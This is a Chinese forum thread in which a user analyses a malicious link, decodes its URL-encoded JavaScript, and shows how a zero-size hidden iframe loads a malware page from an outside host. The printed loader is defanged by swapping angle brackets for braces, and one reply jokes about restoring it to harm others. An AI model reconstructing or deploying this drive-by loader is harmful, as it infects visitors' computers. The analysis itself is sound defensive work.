关于“以天使之名”电脑中毒事件...

红剑之泪

今日偶尔上线..赶上眷念群里有个MM说她电脑因为点了某人发出的网址而壮烈牺牲...
  哎...可怜啊....我分析了一下，下毒的手法很简单..下面就把我分析的过程说出来，大家也看看，不要求看懂，但是多少学点经验...
   OK！Let';s go!~
一，找到目标！
  传说中有毒的网址：http://www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com/（****）/  
   后面我就不写出来了，一以免大家误点...
     好了，把它DOWN下来，大家要注意..这里不能直接在IE浏览器里打开，而是利用下载工具，比如讯雷，把它的网页文件下载来，下载下来后是个网页文件.图标上还有个大大的“e”，这说明，它默认的打开方式，还是用IE浏览器打开，所以这里我们不能直接双击来打开它，也不能点右键→“打开(O)” 不然前面做的事等于白忙.....
二，分析目标...
   这里大家可能要问，既然不能打开它，那下下来干什么？呵呵，我们可以用别的方法来打开它..点右键，选择“打开方式”（注意，不是“打开”）好，在出来的对话框里，选择“记事本”，点确定....这，便是传说中的“用记事本打开”`````打开后，我们就可以看到那个害人的网页的源码了，如下
  

{HTML}
{HEAD}
{SCRIPT LANGUAGE="Javascript"}
{!--
var Words ="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fcount10%2E51yes%2Ecom%2Fclick%2Easpx%3Fid%3D103794789%26logo%3D1%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3Cmeta%20http%2Dequiv%3D%22refresh%22%20content%3D%223%3BURL%3Dhttp%3A%2F%2Fmms2%2Ecaiku%2Ecom%2F%3Fstyle%3D1%26uid%3D20427%22%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3Ciframe%20src%3D%22http%3A%2F%2Fwww%2Ejcwz%2Enet%2Fvipmh2%2Fweb%2Fimage%2Ehtm%22%20width%3D%220%22height%3D%220%22%3E%3C%2Fiframe%3E%0D%0A%3C%2FHTML%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// --}
{/SCRIPT}
{/HEAD}
{BODY}
{/BODY}
{/HTML}

  注意:我已经把源码中的"["和"]"替换为"{"和"}",以免引起不必要的麻烦..
    哈哈，看得懂么?看不懂?没关系，我也不大懂,但这不是重要的,重要的是，我知道怎么办!
  好,直奔主题...这是个经过了加密的网页源码,加密的部分如下:
  

"%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fcount10%2E51yes%2Ecom%2Fclick%2Easpx%3Fid%3D103794789%26logo%3D1%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3Cmeta%20http%2Dequiv%3D%22refresh%22%20content%3D%223%3BURL%3Dhttp%3A%2F%2Fmms2%2Ecaiku%2Ecom%2F%3Fstyle%3D1%26uid%3D20427%22%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3Ciframe%20src%3D%22http%3A%2F%2Fwww%2Ejcwz%2Enet%2Fvipmh2%2Fweb%2Fimage%2Ehtm%22%20width%3D%220%22height%3D%220%22%3E%3C%2Fiframe%3E%0D%0A%3C%2FHTML%3E%0D%0A"

  这点东西,是个神仙也看不懂了,不过放心,人家能加密,我们也能解密撒..呵呵,现在网上有很多的解密网站,当然,有解密的工具也一样...好,让我们来解密,解密后的代码如下:

"{script language="javascript" src="http://count10.51yes.com/click.aspx?id=103794789&logo=1"}{/script}
{HTML}
{HEAD}
{meta http-equiv="refresh" content="3;URL=http://mms2.caiku.com/?style=1&uid=20427"}
{/HEAD}
{BODY}
{/BODY}
{iframe src="http://www.jcwz.net/vipmh2/web/image.htm" width="0"height="0"}{/iframe}
{/HTML}
"

  好!出来了,哈哈,可是有三个网址,那么害人的是那一个呢?
     大家不怕死的,可以一个一个进去看看哈!~(别真去看!)
   大致分析了一下,第一个是做流量统计的,第二个是个彩铃的下载页面,应该是用来做幌子的,第三个,才是害人的网址,其实稍微懂网页源码的人就知道...,在这个网址上用了iframe的标签,意思是在一个网页(既彩铃网页)中插入另一个网页(病毒网页),而且[width="0"height="0"],这就是将病毒网页的显示大小设置为,高和宽都为零,也就是看不见....
    呵呵,差不多了，起码中毒的原因找到了,下次大家就要长个心眼了,现在那真是叫病毒横行啊...不过这人的手段已经很常见了...起码还没到杀人,不,杀电脑于无形的地步....

   诶,那个谁,你还发什么呆啊?!还不快去杀毒?

红剑之泪

汗..刚才我好友发个网址过来...我...我...点了...嘿嘿，不过没毒...哈哈
恩恩..为了这...我也有必要重启一下....

伱骗勒o硪

师傅
你是专门研究这个滴哦``

伱骗勒o硪

不是很懂
但是看你这热情
我还是漫漫看了一遍
师傅真厉害`

眷恋

顶啊`！`嘿嘿你发原码出来我把筐筐一改不就可以拿出去害人了哈哈 ？还是不要说明的好！
那个用记事本打开的方法我学了 ``叫句老师好哈 ！~儿童节快乐别忘鸟带红领巾啊 ！

红剑之泪

哎,你学了又有什么用?还不是糊里糊涂的....你把框了改了也不知道怎么样才能去害人,我是说真的..就算你改了过来,对与你来说,那只是一堆英文字母+符号,没有任何的实际意义...

伱骗勒o硪

楼上说得甚是